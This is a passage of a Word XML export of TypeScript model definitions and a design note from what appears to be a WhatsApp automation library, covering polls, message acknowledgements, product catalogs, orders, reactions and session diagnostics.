          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    isSendFailure: boolean,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ack?: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PollOption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localId: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PollData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total amount of votes recorded so far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totalVotes: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poll options and their respective count of votes.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pollOptions: (PollOption &amp; { count: number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arrray of vote objects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votes: PollVote[]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object of the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pollMessage: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PollVote {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ack: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this vote. For some reason this is different from the msgKey and includes exclamaition marks.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key of this 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msgKey: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the original Poll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parentMsgKey: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original poll options available on the poll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pollOptions: PollOption[],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selected option IDs of the voter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selectedOptionLocalIds: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selected option values by this voter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selectedOptionValues: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ID of the voter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object of the voter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senderObj: Contact,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Timestamp of the vote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senderTimestampMs: number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  stale: boolean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QuoteMap {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  [messageId: string]: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body of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body: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ID of the message that was quoted. Null if no message was quoted.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quotes ?: MessageId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MessageInfoInteraction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contact ID of the contact that interacted with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interaction. You have to x 1000 to use in a JS Date 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MessageInfo {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  deliveryRemaining: number;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  playedRemaining: number;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  readRemaining: number;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  delivery: MessageInfoInteraction[];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  read: MessageInfoInteraction[];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  played: MessageInfoInteraction[];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MessageId;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Message types</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MessageTypes {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  TEXT = 'chat',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  AUDIO = 'audio',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  VOICE = 'ptt',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  IMAGE = 'image',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  VIDEO = 'video',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  DOCUMENT = 'document',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  STICKER = 'sticker',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  LOCATION = 'location',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  CONTACT_CARD = 'vcard',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  CONTACT_CARD_MULTI = 'multi_vcard',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  REVOKED = 'revoked',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ORDER = 'order',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  BUTTONS_RESPONSE = 'buttons_response',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  LIST_RESPONSE = "list_response",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  UNKNOWN = 'unknown'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Message ACK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @readonly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @enum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enum MessageAck {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ACK_ERROR = -1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ACK_PENDING = 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ACK_SERVER = 1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ACK_DEVICE = 2,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ACK_READ = 3,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ACK_PLAYED = 4,</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packages/legacy-documented/src/api/model/message.ts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packages/legacy-documented/src/api/model/product.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// @ts-nocheck</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ChatId, ContactId, MessageId } from "./aliases";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Message } from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CustomProduct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main title of the product. E.g:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * `BAVARIA — 35 SPORTS CRUISER (2006)`</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description of the product. This shows right under the price so it is useful for subscriptions/rentals. E.g:</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`(per day)\n\nCome and have a fantastic sailing adventure aboard our boat. \nShe is a Bavaria 35 sports cruiser and is powered by 2 economical Volvo D6’s with Bravo 2 outdrives as well as a bow thruster. This Makes maneuvering very easy. She can accommodate up to 8 people for day charters and for overnight charters she can accommodate 4 in comfort in 2 cabins.`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price amount multiplied by 1000. For example, for something costing `825` units of currency:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * `825000`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priceAmount1000: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[**ISO 4217**](https://en.wikipedia.org/wiki/ISO_4217) 3 letter currency code. E.g (Swedish krona)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * `SEK`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currency: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product.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At the moment, the URL DOES NOT WORK. It shows up for the recipient but they will not be able to click it. As a rememdy, it is added as a reply to the product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CartItem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 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Amount of this item in the cart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qty: number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     thumbnailId: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URL to .enc file of the thumbnail. Just change the filetype to .jpg to view the thumbnail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thumbnailUrl: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Product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Product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`true` if the product is hidden from public view.</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isHidden?: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catalog in which this product is located.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catalogWid?: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url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name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name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description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description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availiable quantity of this product.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * @default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availability ?: number | "unknown";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review status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reviewStatus ?: "NO_REVIEW" | "PENDING" | "REJECTED" | "APPROVED" | "OUTDATED",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url of the main image of the product.</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NOTE: If downloading manually, the filetype must be changed to .jpg to view the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imageCdnUrl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images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imageCount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Array of URLs of the other images of the product. Does not include the main image.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additionalImageCdnUrl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price of the product in 1000 units.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priceAmount1000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custom id of the product.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retailerId ?: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when the product was created /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 ?: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[**ISO 4217**](https://en.wikipedia.org/wiki/ISO_4217) 3 letter currency code. E.g (Swedish krona)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * `SEK`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currency: string,</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Order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Order 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epoch ts divided by 1000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createdAt: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[**ISO 4217**](https://en.wikipedia.org/wiki/ISO_4217) 3 letter currency code. E.g (Swedish krona)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * `SEK`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currency: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items in the cart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products: CartItem[],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    sellerJid: string,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    subtotal: `${number}`,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    total: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object associated with the order. Only populated in `onOrder` callback.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 Message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packages/legacy-documented/src/api/model/product.ts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packages/legacy-documented/src/api/model/reactions.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ContactId } from "./aliases";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Message, MessageAck } from "./message";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A reaction is identified the specific emoji.</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Reaction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aggregate emoji used for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aggregateEmoji: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identifier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reaction is also sent by the host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hasReactionByMe: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senders of this spefcific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senders: ReactionRecord[];</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The specific reaction by a user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ReactionRecord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acknowledgement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ack: MessageAck;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id: string;</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msgKey: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    parentMsgKey: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    orphan: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text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reactionText: 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If the reaction has been read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ID of the reaction sender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senderUserJid: ContactId;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timestamp of the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timestamp: number;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Emitted by onReaction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export type ReactionEvent =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message being reacted to</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message: Message;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reaction sent by the host account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reactionByMe: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An array of all reactions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reactions: Reaction[];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type of the reaction event.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type: 'add' | 'change';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/legacy-documented/src/api/model/reactions.ts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packages/legacy-documented/src/api/model/sessionInfo.pseudo.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/model/sessionInfo.ts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`packages/legacy/src/api/model/sessionInfo.ts`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Defines the structured diagnostic/session metadata object accumulated during launch and then attached to the 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contents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`sessionInfo.ts:3-22` — `SessionInfo` captures:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - WA/browser/runtime versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - launch timing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - masked account details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - patch/license/debug markers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - CLI/account-type context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `sessionInfo.ts:24-79` — `HealthCheck` describes runtime health probes such as queue depth, session state, phone reachability, injection status, online status, retry countdown, and battery warnings.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is the shape of the metadata the launcher thinks is important enough to preserve and expose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- It is a good reference for designing launch telemetry and health reporting in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Launch/session metadata should capture enough detail to explain versioning, launch timing, account type, and runtime state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Health probes should be expressible in terms of observable session conditions rather than hidden implementation details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Session diagnostics should support both human debugging and machine health checks.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Structured launch/session diagnostics | Preserve | Important for migration observability. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">| Exact fields | Intentionally changed | Fields may evolve if semantic coverage remains.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launch/runtime facts collected from browser, launcher, and client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Outputs: structured `SessionInfo` and `HealthCheck` contracts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Side effects: none.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Missing diagnostic fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Misclassified health state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launch/runtime layers populate this structure consistently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Guarantees: downstream observability/issue-reporting code can rely on structured metadata.</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`LAUNCHING -&gt; DIAGNOSTICS_ACCUMULATING -&gt; SESSION_INFO_AVAILABLE`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `HEALTH_UNKNOWN -&gt; HEALTHY | DEGRADED | UNHEALTHY`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packages/legacy-documented/src/api/model/sessionInfo.pseudo.md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packages/legacy-documented/src/api/model/sessionInfo.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { STATE } from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SessionInfo {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  WA_VERSION: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  PAGE_UA: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  WA_AUTOMATE_VERSION: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  BROWSER_VERSION: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  LAUNCH_TIME_MS?: number;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  NUM?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
